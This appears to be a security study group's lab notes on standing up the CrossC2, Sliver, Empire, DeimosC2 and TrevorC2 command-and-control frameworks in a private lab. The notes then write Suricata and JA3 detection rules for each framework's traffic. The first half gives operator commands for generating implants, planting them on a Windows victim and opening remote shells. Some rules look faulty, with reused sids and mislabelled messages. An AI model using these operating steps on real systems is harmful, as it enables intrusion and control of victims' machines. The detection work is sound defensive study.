【Work within the group】Trojan Horse Reunion

C2 server installation and operation method

CrossC2 operation method

Note: This can only be run if the server and the attacker are on the same host, that is, both are 192.168.230.137

cs server: 192.168.230.137 (kali)
attacker: 192.168.230.137 (kali)
victim: 192.168.230.143 (windows 10)

• On cs server 192.168.230.137:

  1. Open a terminal and type:
     sudo su
./teamserver 192.168.230.137 123456

• On attacker 192.168.230.137:

  1. Open another terminal and enter:
     ./cobaltstrike

  2. Set listener, https

  3. Import plugin, cna file

  4. generate payload

  5. Put the generated malicious files (two, one is lib, one is out) on the victim host

• On victim 192.168.230.143:
  ./t_cc2.out

• Just run wireshark on the attacker 192.168.230.137, filter condition ip.addr==192.168.230.143

How to run sliver

cs server: 192.168.230.137
attacker: 192.168.230.138
victim: 192.168.230.143

• On the cs server 192.168.230.137:
  ./sliver-server_linux
new-operator --name qinjian --lhost 192.168.230.137//Only execute the first time
  multiplayer

• On the attacker 192.168.230.138:
  put the file generated on the cs server 192.168.230.137 in the same directory as sliver-client_linux
  ./sliver-client_linux import qinjian_192.168.230.137.cfg//Only execute the first time
  ./sliver-client_linux

• Next, whether on the cs server or the attacker, execute the following command:
  generate --mtls 192.168.230.137 --save test.exe --os Windows//Generate shell
  mtls//Enable mtls protocol monitoring
  implants//View the generated shell
  jobs//View process

• Put the generated shell file test.exe on the windows victim and run it
  Double-click test.exe

• Next, whether on the cs server or the attacker, execute the following command:
  sessions//view session
  sessions -i id//enter session sessions -k id //end session
  shell --shell-path "C:\\windows\system32\cmd.exe"//enter interactive shell
  exit//exit

• Enable wireshark packet capture on the attacker 192.168.230.138, filter condition ip.addr==192.168.230.143

how to install empire

Note that the cs server and the attacker are the same machine here

cs server: 192.168.230.138
attacker: 192.168.230.138
victim: 192.168.230.143

• Running on cs server 192.168.230.138:
  ./ps-empire server

• Running on attacker 192.168.230.138:
  ./ps-empire client

• Set the listener:
  uselistener [tap键选择监听器类型]
set Name [监听器名称]
set Port [端口号]
execute
listeners//View the set listener
  kill [监听器Name]//Delete the listener

• Set the back door:
  usestager [tap键选择后门类型]
set Listener [监听器Name]
set OutFile [后门文件，例如launcher.bat]//Writable or not, the default is set OutFile launcher.bat
  execute

• Put the launcher.bat in the /var/www/html directory, and let the victim 192.168.230.143 access the file

• Run on the attacker 192.168.230.138:
  agents//View the obtained proxy session
  shell whoami//Execute the command

DeimosC2 installation tutorial

cs server: 192.168.230.137
attacker: 192.168.230.138
victim: 192.168.230.143

• cs server run:
  ./DeimosC2

• On the attacker:
  log in to https://192.168.230.137:8443
  Username: qinjian
  Password: qinjian1030
  add listener – address is set to 192.168.230.137
  to download the agents corresponding to the operating system, the download location can be downloaded from the download icon in the upper right corner of the browser turn up

• On the victim:
  run the downloaded agents

TrevorC2 installation tutorial:

cs server: 192.168.230.137
attacker: 192.168.230.138
victim: 192.168.230.143

sudo su
conda create -n py37 python=3.7(Only need to run for the first time)
conda activate py37

• Run on the cs server:
  Directory: SecistSploit
  sudo su
conda activate py37
python SSF.py
use listener/trevorc2
show options
set lhost [本机ip]// Set current ip
  set target 2// Set the type of generated agent file, there are three types 1->C# 2->powershell 3->python
  run// Generate agent file

  list// View the victim host
  interact 1// Interact with the victim host

• Run the generated agent file on the victim

Traffic characteristics of C2 server

CrossC2

1. Heartbeat packet

Suricata rules:
what I think:alert tcp any any -> any any (msg:"Heartbeat Extension Detected"; flow:established; tls.handshake.type: 1; tls.handshake.extensions["heartbeat"]; content:"|00 0F 00 01 01|"; depth:5;sid:100001; rev:1; )

Actual use:alert tcp any any -> any any (msg:"Heartbeat Extension Detected";flow:established;content:"|00 0F 00 01 01|";sid:100001;rev:1;)

2. Command

1. When executing the command, it is different from the usual heartbeat packet, and some more data will be transmitted:
   

2. And the encrypted data 00 00 00 00 00 00 00 02starts with
   

   Suricata rules:alert tls any any -> any any (msg:"Detect HTTPS Application Data with 0000000000000002";content: "|00 00 00 00 00 00 00 02|";flow:established; sid:100002; rev:1;)

3. ja3/ja3s

ja3：alert tls any any -> any any(msg:"CorssC2 https ja3";ja3.hash;content:"fd80fa9c6120cdeea8520510f3c644ac";classtype:misc-activity;sid:1001;rev:1)

ja3s：alert tls any any <> any any(msg:"CorssC2 https ja3s";ja3s.hash;content:"b7bd51222a09f3ad66a340710ae9c01a";sid:1002)

Sliver

1. http

• Unique header-specific identifier/specific request-response schema (html)

  Observing the source code of sliver, it is found that Sliver’s C2 Trojan connects to the server with 5 types of messages. The built-in path segment is used to randomly generate the request path. All paths will have one of the following extensions. Different file extensions indicate the type of request. Everything in the path is ignored by the server except the extension.

  • .woff = Stagers (not used by default)
  • .js = Long poll messages (long message polling, encrypted interaction data)
  • .html = Key exchange messages (key exchange, set-cookie)
  • .php = Session messages
  • .png = Close session messages

  The method of random path generation:
  
  request package characteristics:

  1. Method: POST/GET
  2. path is a combination of multiple strings in the string list corresponding to each suffix: StagerPaths, PollPaths, SessionPaths, ClosePaths
  3. The file name is one of the string lists corresponding to each suffix: StagerFiles, PollFiles, SessionFiles, CloseFiles
  4. File extensions: .woff, .js, .html, .php, .png
  5. The parameter name is NonceQueryArgs: "abcdefghijklmnopqrstuvwxyz_", select 1-2 from these strings
  6. The length of the nonce value is 1 to 10 digits, including numbers and lowercase letters and underscores.

  In summary, the written suricata rules are:

  .woff：alert tcp any any -> any any (msg: "Sliver HTTP woff request"; flow:to_server,established;content:".woff";http_uri;pcre: "/\/(static|assets|fonts|locales)(.*?)((attribute_text_w01_regular|ZillaSlab-Regular\.subset\.bbc33fb47cf6|ZillaSlab-Bold\.subset\.e96c15f68c68|Inter-Regular|Inter-Medium)\.woff)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000001;classtype:trojan-activity; rev:1;)

  .js：alert tcp any any -> any any (msg: "Sliver HTTP js request"; flow:to_server,established;content:"GET";http_method;nocase;content:".js";http_uri;pcre: "/\/(js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript)(.*?)((bootstrap|bootstrap.min|jquery.min|jquery|route|app|app.min|array|backbone|script|email)\.js)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000002;classtype:trojan-activity; rev:1;)

  .html：alert tcp any any -> any any (msg: "Sliver HTTP html request&getsessionID"; flow:to_server,established;content:"POST";http_method;nocase;content:".html";http_uri;pcre: "/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.html)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000003;flowbits:set,name;flowbits:noalert;classtype:trojan-activity; rev:1;)

  .html：alert tcp any any <> any any (msg: "Sliver HTTP html response&set-cookie";flow:to_client,established;content:"Set-Cookie";http_header;pcre:"/^Set-Cookie\:\s*(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)\=[a-z0-9]{32}\;\s*HttpOnly$/i";sid:1000004;flowbits:isset,name;classtype:trojan-activity;)

  .php：alert tcp any any -> any any (msg: "Sliver HTTP php request"; flow:to_server,established;content:"POST";http_method;nocase;content:".php";http_uri;pcre: "/\/(php|api|upload|actions|rest|v1|oauth2callback|authenticate|oauth2|oauth|auth|database|db|namespaces)(.*?)((login|signin|api|samples|rpc|index|admin|register|sign-up)\.php)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000005;classtype:trojan-activity; rev:1;)

  .png：alert tcp any any -> any any (msg: "Sliver HTTP png request"; flow:to_server,established;content:".png";http_uri;pcre: "/\/(static|www|assets|images|icons|image|icon|png)(.*?)((favicon|sample|example)\.png)\?[a-z_]{1,2}=[a-z0-9_]{1,10}/i";sid:1000006;classtype:trojan-activity; rev:1;)

2. https

• ja3(s) encrypted fingerprint features:

  ja3：Alert tls any any -> any any(msg:"sliver https debian";ja3.hash;content:"19e29534fd49dd27d09234e639c4057e";classtype:misc-activity;sid:1001;rev:1)

  ja3s：Alert tls any any <> any any(msg:"sliver https";ja3s.hash;content:"f4febc55ea12b31ae17cfb7e614afda8";sid:1002)

empire

http

https

DeimosC2

https

• tls version 1.2/1.3
  

• https port number: C2 server defaults to 4443 (but can be modified)

• ja3(s) encrypted fingerprint feature
  ja3: Alert tls any any -> any any(msg:"sliver https debian";ja3.hash;content:"e564ee1b7bcae4467d8c759df910ed9c";classtype:misc-activity;sid:1001;rev:1)
  ja3s: Alert tls any any <> any any(msg:"sliver https";ja3s.hash;content:"f4febc55ea12b31ae17cfb7e614afda8";sid:1002)(same as sliver)
  
  

TrevorC2

• Heartbeat packet: http (the corresponding http packet returned by the server host will contain a lot of payload, and Reassembled TCP length: 386861)
  
  

• Every time the port number of the victim host sends an http request, a port is changed, and the port number is increased by 1
  
  
  Suricata rule: alert tcp any any -> any any (msg:"HTTP Request Source Port Sequential Increase"; flow:established, to_server; content:"GET"; http_method; pcre:"/^Host:[^\r\n]+\r\n/"; lua:check_port.lua; sid:100001; rev:1;)
  check_port.lua code:

  function init(args)
      -- 这里可以执行一些初始化操作
  
      local rules = {
        
        }
      return rules
  end
  
  function check_port(pkt, data)
      if not pkt.is_http or not pkt.is_request then
          return 0
      end
  
      local src_port = pkt.src_port
      local prev_src_port = pkt.prev_pkt.src_port
  
      if src_port ~= prev_src_port + 1 then
          return 1
      end
  
      return 0
  end
  
  

• Interactively send commands, the victim host will send a url as: /images?guid=xxxx, xxxx is similar to base64 encoding, and will be filled with = at the end (sometimes it can be decoded with base64, sometimes it cannot, and the decoded encoding is also very like base64 encoding)
  
  Suricata rules:alert tcp any any -> any any (msg: "TrevorC2 interact"; flow:to_server,established;content:"/images?guid=";http_uri;pcre: "/\/images\?guid=[A-za-z0-9+\/=](.*)/i";sid:1000002;classtype:trojan-activity; rev:1;)